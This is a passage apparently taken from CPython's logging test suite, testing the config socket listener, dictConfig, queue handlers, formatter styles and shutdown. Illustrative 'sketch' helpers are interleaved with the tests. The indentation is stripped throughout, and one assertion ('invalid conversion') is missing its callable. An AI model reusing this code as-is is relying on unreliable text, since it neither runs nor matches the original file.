"handlers": {
"file": {
"class": "logging.FileHandler",
"filename": fn
}
},
"root": {
"handlers": ["file"]
}
}
self.apply_config(config)
self.apply_config(config)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
def setup_via_listener(self, text, verify=None):
text = text.encode("utf-8")
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0, verify)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
support.join_thread(t, 2.0)
def test_listen_config_10_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_listen_config_1_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_listen_verify(self):
def verify_fail(stuff):
return None
def verify_reverse(stuff):
return stuff[::-1]
logger = logging.getLogger("compiler.parser")
to_send = textwrap.dedent(ConfigFileTest.config1)
# First, specify a verification function that will fail.
# We expect to see no output, since our configuration
# never took effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send, verify_fail)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([], stream=output)
# Original logger output has the stuff we logged.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform no verification. Our configuration
# should take effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send) # no verify callable specified
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform verification which transforms the bytes.
with support.captured_stdout() as output:
self.setup_via_listener(to_send[::-1], verify_reverse)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
def test_out_of_order(self):
self.assertRaises(ValueError, self.apply_config, self.out_of_order)
def test_out_of_order_with_dollar_style(self):
config = copy.deepcopy(self.out_of_order)
config['formatters']['mySimpleFormatter']['format'] = "${asctime} (${name}) ${levelname}: ${message}"
self.apply_config(config)
handler = logging.getLogger('mymodule').handlers[0]
self.assertIsInstance(handler.target, logging.Handler)
self.assertIsInstance(handler.formatter._style,
logging.StringTemplateStyle)
def test_custom_formatter_class_with_validate(self):
self.apply_config(self.custom_formatter_class_validate)
handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
self.assertIsInstance(handler.formatter, ExceptionFormatter)
def test_custom_formatter_class_with_validate2(self):
self.apply_config(self.custom_formatter_class_validate2)
handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
self.assertIsInstance(handler.formatter, ExceptionFormatter)
def test_custom_formatter_class_with_validate2_with_wrong_fmt(self):
config = self.custom_formatter_class_validate.copy()
config['formatters']['form1']['style'] = "$"
        # No exception should be raised, since 'validate' is set to False
self.apply_config(config)
handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
self.assertIsInstance(handler.formatter, ExceptionFormatter)
def test_custom_formatter_class_with_validate3(self):
self.assertRaises(ValueError, self.apply_config, self.custom_formatter_class_validate3)
def test_custom_formatter_function_with_validate(self):
self.assertRaises(ValueError, self.apply_config, self.custom_formatter_with_function)
def test_baseconfig(self):
d = {
'atuple': (1, 2, 3),
'alist': ['a', 'b', 'c'],
'adict': {'d': 'e', 'f': 3 },
'nest1': ('g', ('h', 'i'), 'j'),
'nest2': ['k', ['l', 'm'], 'n'],
'nest3': ['o', 'cfg://alist', 'p'],
}
bc = logging.config.BaseConfigurator(d)
self.assertEqual(bc.convert('cfg://atuple[1]'), 2)
self.assertEqual(bc.convert('cfg://alist[1]'), 'b')
self.assertEqual(bc.convert('cfg://nest1[1][0]'), 'h')
self.assertEqual(bc.convert('cfg://nest2[1][1]'), 'm')
self.assertEqual(bc.convert('cfg://adict.d'), 'e')
self.assertEqual(bc.convert('cfg://adict[f]'), 3)
v = bc.convert('cfg://nest3')
self.assertEqual(v.pop(1), ['a', 'b', 'c'])
self.assertRaises(KeyError, bc.convert, 'cfg://nosuch')
self.assertRaises(ValueError, bc.convert, 'cfg://!')
self.assertRaises(KeyError, bc.convert, 'cfg://adict[2]')
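# A minimal sketch, not part of the test suite, pulling together two dictConfig
# features exercised above: 'ext://' references resolve to existing objects such as
# sys.stdout, and the '.' key sets extra attributes on the constructed handler
# (here its ``terminator``), as test_config14_ok verifies:
def _example_dict_config():
    import logging
    import logging.config
    logging.config.dictConfig({
        'version': 1,
        'disable_existing_loggers': False,
        'formatters': {
            'plain': {'format': '%(levelname)s ++ %(message)s'},
        },
        'handlers': {
            'console': {
                'class': 'logging.StreamHandler',
                'formatter': 'plain',
                'level': 'NOTSET',
                'stream': 'ext://sys.stdout',
                '.': {'terminator': '!\n'},
            },
        },
        'root': {'level': 'WARNING', 'handlers': ['console']},
    })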
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
def test_set_log_record_factory(self):
man = logging.Manager(None)
expected = object()
man.setLogRecordFactory(expected)
self.assertEqual(man.logRecordFactory, expected)
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertIs(c1, logging.getLogger('xyz'))
self.assertIs(c2, logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertIs(c1, logging.getLogger('abc.def'))
self.assertIs(c2, logging.getLogger('abc.def.ghi'))
self.assertIs(c2, c3)
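# A minimal sketch, not part of the test suite: Logger.getChild() resolves the given
# suffix relative to its owner, so both lookups below name the same logger object:
def _example_get_child():
    import logging
    parent = logging.getLogger('example.parent')
    assert parent.getChild('sub.leaf') is logging.getLogger('example.parent.sub.leaf')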
class DerivedLogRecord(logging.LogRecord):
pass
class LogRecordFactoryTest(BaseTest):
def setUp(self):
class CheckingFilter(logging.Filter):
def __init__(self, cls):
self.cls = cls
def filter(self, record):
t = type(record)
if t is not self.cls:
msg = 'Unexpected LogRecord type %s, expected %s' % (t,
self.cls)
raise TypeError(msg)
return True
BaseTest.setUp(self)
self.filter = CheckingFilter(DerivedLogRecord)
self.root_logger.addFilter(self.filter)
self.orig_factory = logging.getLogRecordFactory()
def tearDown(self):
self.root_logger.removeFilter(self.filter)
BaseTest.tearDown(self)
logging.setLogRecordFactory(self.orig_factory)
def test_logrecord_class(self):
self.assertRaises(TypeError, self.root_logger.warning,
self.next_message())
logging.setLogRecordFactory(DerivedLogRecord)
self.root_logger.error(self.next_message())
self.assert_log_lines([
('root', 'ERROR', '2'),
])
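# A minimal sketch, not part of the test suite: the same setLogRecordFactory() hook
# swapped by LogRecordFactoryTest can be used to attach extra fields to every record;
# the ``request_id`` attribute below is purely illustrative:
def _example_record_factory():
    import logging
    old_factory = logging.getLogRecordFactory()
    def factory(*args, **kwargs):
        record = old_factory(*args, **kwargs)
        record.request_id = 'n/a'   # available to formatters as %(request_id)s
        return record
    logging.setLogRecordFactory(factory)
    return old_factory              # so a caller can restore the original factory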
class QueueHandlerTest(BaseTest):
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.queue = queue.Queue(-1)
self.que_hdlr = logging.handlers.QueueHandler(self.queue)
self.name = 'que'
self.que_logger = logging.getLogger('que')
self.que_logger.propagate = False
self.que_logger.setLevel(logging.WARNING)
self.que_logger.addHandler(self.que_hdlr)
def tearDown(self):
self.que_hdlr.close()
BaseTest.tearDown(self)
def test_queue_handler(self):
self.que_logger.debug(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
self.que_logger.info(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
msg = self.next_message()
self.que_logger.warning(msg)
data = self.queue.get_nowait()
self.assertTrue(isinstance(data, logging.LogRecord))
self.assertEqual(data.name, self.que_logger.name)
self.assertEqual((data.msg, data.args), (msg, None))
def test_formatting(self):
msg = self.next_message()
levelname = logging.getLevelName(logging.WARNING)
log_format_str = '{name} -> {levelname}: {message}'
formatted_msg = log_format_str.format(name=self.name,
levelname=levelname, message=msg)
formatter = logging.Formatter(self.log_format)
self.que_hdlr.setFormatter(formatter)
self.que_logger.warning(msg)
log_record = self.queue.get_nowait()
self.assertEqual(formatted_msg, log_record.msg)
self.assertEqual(formatted_msg, log_record.message)
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener(self):
handler = support.TestHandler(support.Matcher())
listener = logging.handlers.QueueListener(self.queue, handler)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertTrue(handler.matches(levelno=logging.WARNING, message='1'))
self.assertTrue(handler.matches(levelno=logging.ERROR, message='2'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='3'))
handler.close()
# Now test with respect_handler_level set
handler = support.TestHandler(support.Matcher())
handler.setLevel(logging.CRITICAL)
listener = logging.handlers.QueueListener(self.queue, handler,
respect_handler_level=True)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertFalse(handler.matches(levelno=logging.WARNING, message='4'))
self.assertFalse(handler.matches(levelno=logging.ERROR, message='5'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='6'))
handler.close()
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener_with_StreamHandler(self):
        # Test that the traceback is only appended once (bpo-34334).
listener = logging.handlers.QueueListener(self.queue, self.root_hdlr)
listener.start()
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.que_logger.exception(self.next_message(), exc_info=exc)
listener.stop()
self.assertEqual(self.stream.getvalue().strip().count('Traceback'), 1)
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener_with_multiple_handlers(self):
# Test that queue handler format doesn't affect other handler formats (bpo-35726).
self.que_hdlr.setFormatter(self.root_formatter)
self.que_logger.addHandler(self.root_hdlr)
listener = logging.handlers.QueueListener(self.queue, self.que_hdlr)
listener.start()
self.que_logger.error("error")
listener.stop()
self.assertEqual(self.stream.getvalue().strip(), "que -> ERROR: error")
if hasattr(logging.handlers, 'QueueListener'):
import multiprocessing
from unittest.mock import patch
class QueueListenerTest(BaseTest):
"""
Tests based on patch submitted for issue #27930. Ensure that
QueueListener handles all log messages.
"""
repeat = 20
@staticmethod
def setup_and_log(log_queue, ident):
"""
Creates a logger with a QueueHandler that logs to a queue read by a
QueueListener. Starts the listener, logs five messages, and stops
the listener.
"""
logger = logging.getLogger('test_logger_with_id_%s' % ident)
logger.setLevel(logging.DEBUG)
handler = logging.handlers.QueueHandler(log_queue)
logger.addHandler(handler)
listener = logging.handlers.QueueListener(log_queue)
listener.start()
logger.info('one')
logger.info('two')
logger.info('three')
logger.info('four')
logger.info('five')
listener.stop()
logger.removeHandler(handler)
handler.close()
@patch.object(logging.handlers.QueueListener, 'handle')
def test_handle_called_with_queue_queue(self, mock_handle):
for i in range(self.repeat):
log_queue = queue.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@patch.object(logging.handlers.QueueListener, 'handle')
def test_handle_called_with_mp_queue(self, mock_handle):
# Issue 28668: The multiprocessing (mp) module is not functional
# when the mp.synchronize module cannot be imported.
support.import_module('multiprocessing.synchronize')
for i in range(self.repeat):
log_queue = multiprocessing.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
log_queue.close()
log_queue.join_thread()
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@staticmethod
def get_all_from_queue(log_queue):
try:
while True:
yield log_queue.get_nowait()
except queue.Empty:
return []
def test_no_messages_in_queue_after_stop(self):
"""
Five messages are logged then the QueueListener is stopped. This
test then gets everything off the queue. Failure of this test
indicates that messages were not registered on the queue until
_after_ the QueueListener stopped.
"""
# Issue 28668: The multiprocessing (mp) module is not functional
# when the mp.synchronize module cannot be imported.
support.import_module('multiprocessing.synchronize')
for i in range(self.repeat):
queue = multiprocessing.Queue()
self.setup_and_log(queue, '%s_%s' %(self.id(), i))
# time.sleep(1)
items = list(self.get_all_from_queue(queue))
queue.close()
queue.join_thread()
expected = [[], [logging.handlers.QueueListener._sentinel]]
self.assertIn(items, expected,
'Found unexpected messages in queue: %s' % (
[m.msg if isinstance(m, logging.LogRecord)
else m for m in items]))
def test_calls_task_done_after_stop(self):
# Issue 36813: Make sure queue.join does not deadlock.
log_queue = queue.Queue()
listener = logging.handlers.QueueListener(log_queue)
listener.start()
listener.stop()
with self.assertRaises(ValueError):
# Make sure all tasks are done and .join won't block.
log_queue.task_done()
ZERO = datetime.timedelta(0)
class UTC(datetime.tzinfo):
def utcoffset(self, dt):
return ZERO
dst = utcoffset
def tzname(self, dt):
return 'UTC'
utc = UTC()
class FormatterTest(unittest.TestCase):
def setUp(self):
self.common = {
'name': 'formatter.test',
'level': logging.DEBUG,
'pathname': os.path.join('path', 'to', 'dummy.ext'),
'lineno': 42,
'exc_info': None,
'func': None,
'msg': 'Message with %d %s',
'args': (2, 'placeholders'),
}
self.variants = {
}
def get_record(self, name=None):
result = dict(self.common)
if name is not None:
result.update(self.variants[name])
return logging.makeLogRecord(result)
def assert_error_message(self, exception, message, *args, **kwargs):
try:
self.assertRaises(exception, *args, **kwargs)
except exception as e:
self.assertEqual(message, e.message)
def test_percent(self):
# Test %-formatting
r = self.get_record()
f = logging.Formatter('${%(message)s}')
self.assertEqual(f.format(r), '${Message with 2 placeholders}')
f = logging.Formatter('%(random)s')
self.assertRaises(ValueError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('%(asctime)s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)-15s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)#15s')
self.assertTrue(f.usesTime())
def test_braces(self):
# Test {}-formatting
r = self.get_record()
f = logging.Formatter('$%{message}%$', style='{')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('{random}', style='{')
self.assertRaises(ValueError, f.format, r)
f = logging.Formatter("{message}", style='{')
self.assertFalse(f.usesTime())
f = logging.Formatter('{asctime}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime!s:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime:15}', style='{')
self.assertTrue(f.usesTime())
def test_dollars(self):
# Test $-formatting
r = self.get_record()
f = logging.Formatter('${message}', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$message', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$$%${message}%$$', style='$')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('${random}', style='$')
self.assertRaises(ValueError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('$asctime', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('${message}', style='$')
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}--', style='$')
self.assertTrue(f.usesTime())
def test_format_validate(self):
# Check correct formatting
# Percentage style
f = logging.Formatter("%(levelname)-15s - %(message) 5s - %(process)03d - %(module) - %(asctime)*.3s")
self.assertEqual(f._fmt, "%(levelname)-15s - %(message) 5s - %(process)03d - %(module) - %(asctime)*.3s")
f = logging.Formatter("%(asctime)*s - %(asctime)*.3s - %(process)-34.33o")
self.assertEqual(f._fmt, "%(asctime)*s - %(asctime)*.3s - %(process)-34.33o")
f = logging.Formatter("%(process)#+027.23X")
self.assertEqual(f._fmt, "%(process)#+027.23X")
f = logging.Formatter("%(foo)#.*g")
self.assertEqual(f._fmt, "%(foo)#.*g")
# StrFormat Style
f = logging.Formatter("$%{message}%$ - {asctime!a:15} - {customfield['key']}", style="{")
self.assertEqual(f._fmt, "$%{message}%$ - {asctime!a:15} - {customfield['key']}")
f = logging.Formatter("{process:.2f} - {custom.f:.4f}", style="{")
self.assertEqual(f._fmt, "{process:.2f} - {custom.f:.4f}")
f = logging.Formatter("{customfield!s:#<30}", style="{")
self.assertEqual(f._fmt, "{customfield!s:#<30}")
f = logging.Formatter("{message!r}", style="{")
self.assertEqual(f._fmt, "{message!r}")
f = logging.Formatter("{message!s}", style="{")
self.assertEqual(f._fmt, "{message!s}")
f = logging.Formatter("{message!a}", style="{")
self.assertEqual(f._fmt, "{message!a}")
f = logging.Formatter("{process!r:4.2}", style="{")
self.assertEqual(f._fmt, "{process!r:4.2}")
f = logging.Formatter("{process!s:<#30,.12f}- {custom:=+#30,.1d} - {module:^30}", style="{")
self.assertEqual(f._fmt, "{process!s:<#30,.12f}- {custom:=+#30,.1d} - {module:^30}")
f = logging.Formatter("{process!s:{w},.{p}}", style="{")
self.assertEqual(f._fmt, "{process!s:{w},.{p}}")
f = logging.Formatter("{foo:12.{p}}", style="{")
self.assertEqual(f._fmt, "{foo:12.{p}}")
f = logging.Formatter("{foo:{w}.6}", style="{")
self.assertEqual(f._fmt, "{foo:{w}.6}")
f = logging.Formatter("{foo[0].bar[1].baz}", style="{")
self.assertEqual(f._fmt, "{foo[0].bar[1].baz}")
f = logging.Formatter("{foo[k1].bar[k2].baz}", style="{")
self.assertEqual(f._fmt, "{foo[k1].bar[k2].baz}")
f = logging.Formatter("{12[k1].bar[k2].baz}", style="{")
self.assertEqual(f._fmt, "{12[k1].bar[k2].baz}")
# Dollar style
f = logging.Formatter("${asctime} - $message", style="$")
self.assertEqual(f._fmt, "${asctime} - $message")
f = logging.Formatter("$bar $$", style="$")
self.assertEqual(f._fmt, "$bar $$")
f = logging.Formatter("$bar $$$$", style="$")
self.assertEqual(f._fmt, "$bar $$$$") # this would print two $($$)
        # Test that ValueError is raised for incorrectly specified formats.
# Percentage Style
self.assertRaises(ValueError, logging.Formatter, "%(asctime)Z")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)b")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)*")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)*3s")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)_")
self.assertRaises(ValueError, logging.Formatter, '{asctime}')
self.assertRaises(ValueError, logging.Formatter, '${message}')
self.assertRaises(ValueError, logging.Formatter, '%(foo)#12.3*f') # with both * and decimal number as precision
self.assertRaises(ValueError, logging.Formatter, '%(foo)0*.8*f')
# StrFormat Style
# Testing failure for '-' in field name
self.assert_error_message(
ValueError,
"invalid field name/expression: 'name-thing'",
logging.Formatter, "{name-thing}", style="{"
)
# Testing failure for style mismatch
self.assert_error_message(
ValueError,
"invalid format: no fields",
logging.Formatter, '%(asctime)s', style='{'
)
# Testing failure for invalid conversion
self.assert_error_message(
ValueError,
"invalid conversion: 'Z'"
)
self.assertRaises(ValueError, logging.Formatter, '{asctime!s:#30,15f}', style='{')
self.assert_error_message(
ValueError,
"invalid format: expected ':' after conversion specifier",
logging.Formatter, '{asctime!aa:15}', style='{'
)
# Testing failure for invalid spec
self.assert_error_message(
ValueError,
"bad specifier: '.2ff'",
logging.Formatter, '{process:.2ff}', style='{'
)
self.assertRaises(ValueError, logging.Formatter, '{process:.2Z}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{process!s:<##30,12g}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{process!s:<#30#,12g}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{process!s:{{w}},{{p}}}', style='{')
        # Testing failure for mismatched braces
self.assert_error_message(
ValueError,
"invalid format: unmatched '{' in format spec",
logging.Formatter, '{process', style='{'
)
self.assert_error_message(
ValueError,
"invalid format: unmatched '{' in format spec",
logging.Formatter, 'process}', style='{'
)
self.assertRaises(ValueError, logging.Formatter, '{{foo!r:4.2}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{{foo!r:4.2}}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo/bar}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo:{{w}}.{{p}}}}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!X:{{w}}.{{p}}}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!a:random}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!a:ran{dom}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!a:ran{d}om}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo.!a:d}', style='{')
# Dollar style
        # Testing failure for a bare '$'
self.assert_error_message(
ValueError,
"invalid format: bare \'$\' not allowed",
logging.Formatter, '$bar $$$', style='$'
)
self.assert_error_message(
ValueError,
"invalid format: bare \'$\' not allowed",
logging.Formatter, 'bar $', style='$'
)
self.assert_error_message(
ValueError,
"invalid format: bare \'$\' not allowed",
logging.Formatter, 'foo $.', style='$'
)
        # Testing failure for mismatched style
self.assert_error_message(
ValueError,
"invalid format: no fields",
logging.Formatter, '{asctime}', style='$'
)
self.assertRaises(ValueError, logging.Formatter, '%(asctime)s', style='$')
# Testing failure for incorrect fields
self.assert_error_message(
ValueError,
"invalid format: no fields",
logging.Formatter, 'foo', style='$'
)
self.assertRaises(ValueError, logging.Formatter, '${asctime', style='$')
def test_invalid_style(self):
self.assertRaises(ValueError, logging.Formatter, None, None, 'x')
def test_time(self):
r = self.get_record()
dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 0, utc)
# We use None to indicate we want the local timezone
# We're essentially converting a UTC time to local time
r.created = time.mktime(dt.astimezone(None).timetuple())
r.msecs = 123
f = logging.Formatter('%(asctime)s %(message)s')
f.converter = time.gmtime
self.assertEqual(f.formatTime(r), '1993-04-21 08:03:00,123')
self.assertEqual(f.formatTime(r, '%Y:%d'), '1993:21')
f.format(r)
self.assertEqual(r.asctime, '1993-04-21 08:03:00,123')
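# A minimal sketch, not part of the test suite: the three formatting styles
# validated above ('%', '{' and '$') applied to one record all yield the same text:
def _example_formatter_styles():
    import logging
    record = logging.makeLogRecord({'msg': 'hello %s', 'args': ('world',),
                                    'levelname': 'INFO'})
    styles = [logging.Formatter('%(levelname)s: %(message)s'),           # '%' (default)
              logging.Formatter('{levelname}: {message}', style='{'),
              logging.Formatter('${levelname}: ${message}', style='$')]
    return [f.format(record) for f in styles]   # three times 'INFO: hello world'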
class TestBufferingFormatter(logging.BufferingFormatter):
def formatHeader(self, records):
return '[(%d)' % len(records)
def formatFooter(self, records):
return '(%d)]' % len(records)
class BufferingFormatterTest(unittest.TestCase):
def setUp(self):
self.records = [
logging.makeLogRecord({'msg': 'one'}),
logging.makeLogRecord({'msg': 'two'}),
]
def test_default(self):
f = logging.BufferingFormatter()
self.assertEqual('', f.format([]))
self.assertEqual('onetwo', f.format(self.records))
def test_custom(self):
f = TestBufferingFormatter()
self.assertEqual('[(2)onetwo(2)]', f.format(self.records))
lf = logging.Formatter('<%(message)s>')
f = TestBufferingFormatter(lf)
self.assertEqual('[(2)<one><two>(2)]', f.format(self.records))
class ExceptionTest(BaseTest):
def test_formatting(self):
r = self.root_logger
h = RecordingHandler()
r.addHandler(h)
try:
raise RuntimeError('deliberate mistake')
except:
logging.exception('failed', stack_info=True)
r.removeHandler(h)
h.close()
r = h.records[0]
self.assertTrue(r.exc_text.startswith('Traceback (most recent '
'call last):\n'))
self.assertTrue(r.exc_text.endswith('\nRuntimeError: '
'deliberate mistake'))
self.assertTrue(r.stack_info.startswith('Stack (most recent '
'call last):\n'))
self.assertTrue(r.stack_info.endswith('logging.exception(\'failed\', '
'stack_info=True)'))
class LastResortTest(BaseTest):
def test_last_resort(self):
# Test the last resort handler
root = self.root_logger
root.removeHandler(self.root_hdlr)
old_lastresort = logging.lastResort
old_raise_exceptions = logging.raiseExceptions
try:
with support.captured_stderr() as stderr:
root.debug('This should not appear')
self.assertEqual(stderr.getvalue(), '')
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), 'Final chance!\n')
# No handlers and no last resort, so 'No handlers' message
logging.lastResort = None
with support.captured_stderr() as stderr:
root.warning('Final chance!')
msg = 'No handlers could be found for logger "root"\n'
self.assertEqual(stderr.getvalue(), msg)
# 'No handlers' message only printed once
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
# If raiseExceptions is False, no message is printed
root.manager.emittedNoHandlerWarning = False
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
finally:
root.addHandler(self.root_hdlr)
logging.lastResort = old_lastresort
logging.raiseExceptions = old_raise_exceptions
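# A minimal sketch, not part of the test suite, of the behaviour LastResortTest pins
# down: assuming neither the logger nor any of its ancestors has a handler, records at
# WARNING and above fall back to logging.lastResort, which writes the bare message to stderr:
def _example_last_resort():
    import logging
    orphan = logging.getLogger('example.without.handlers')
    orphan.warning('reaches stderr via logging.lastResort')
    orphan.debug("dropped: below lastResort's WARNING threshold")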
class FakeHandler:
def __init__(self, identifier, called):
for method in ('acquire', 'flush', 'close', 'release'):
setattr(self, method, self.record_call(identifier, method, called))
def record_call(self, identifier, method_name, called):
def inner():
called.append('{} - {}'.format(identifier, method_name))
return inner
class RecordingHandler(logging.NullHandler):
def __init__(self, *args, **kwargs):
super(RecordingHandler, self).__init__(*args, **kwargs)
self.records = []
def handle(self, record):
"""Keep track of all the emitted records."""
self.records.append(record)
class ShutdownTest(BaseTest):
"""Test suite for the shutdown method."""
def setUp(self):
super(ShutdownTest, self).setUp()
self.called = []
raise_exceptions = logging.raiseExceptions
self.addCleanup(setattr, logging, 'raiseExceptions', raise_exceptions)
def raise_error(self, error):
def inner():
raise error()
return inner
def test_no_failure(self):
# create some fake handlers
handler0 = FakeHandler(0, self.called)
handler1 = FakeHandler(1, self.called)
handler2 = FakeHandler(2, self.called)
# create live weakref to those handlers
handlers = map(logging.weakref.ref, [handler0, handler1, handler2])
logging.shutdown(handlerList=list(handlers))
expected = ['2 - acquire', '2 - flush', '2 - close', '2 - release',
'1 - acquire', '1 - flush', '1 - close', '1 - release',
'0 - acquire', '0 - flush', '0 - close', '0 - release']
self.assertEqual(expected, self.called)
def _test_with_failure_in_method(self, method, error):
handler = FakeHandler(0, self.called)
setattr(handler, method, self.raise_error(error))
handlers = [logging.weakref.ref(handler)]
logging.shutdown(handlerList=list(handlers))
self.assertEqual('0 - release', self.called[-1])
def test_with_ioerror_in_acquire(self):
self._test_with_failure_in_method('acquire', OSError)
def test_with_ioerror_in_flush(self):
self._test_with_failure_in_method('flush', OSError)
def test_with_ioerror_in_close(self):
self._test_with_failure_in_method('close', OSError)
def test_with_valueerror_in_acquire(self):
self._test_with_failure_in_method('acquire', ValueError)
def test_with_valueerror_in_flush(self):
self._test_with_failure_in_method('flush', ValueError)
def test_with_valueerror_in_close(self):
self._test_with_failure_in_method('close', ValueError)
def test_with_other_error_in_acquire_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('acquire', IndexError)
def test_with_other_error_in_flush_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('flush', IndexError)
def test_with_other_error_in_close_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('close', IndexError)
def test_with_other_error_in_acquire_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'acquire', IndexError)
def test_with_other_error_in_flush_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'flush', IndexError)
def test_with_other_error_in_close_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'close', IndexError)
class ModuleLevelMiscTest(BaseTest):
"""Test suite for some module level methods."""
def test_disable(self):
old_disable = logging.root.manager.disable
# confirm our assumptions are correct
self.assertEqual(old_disable, 0)
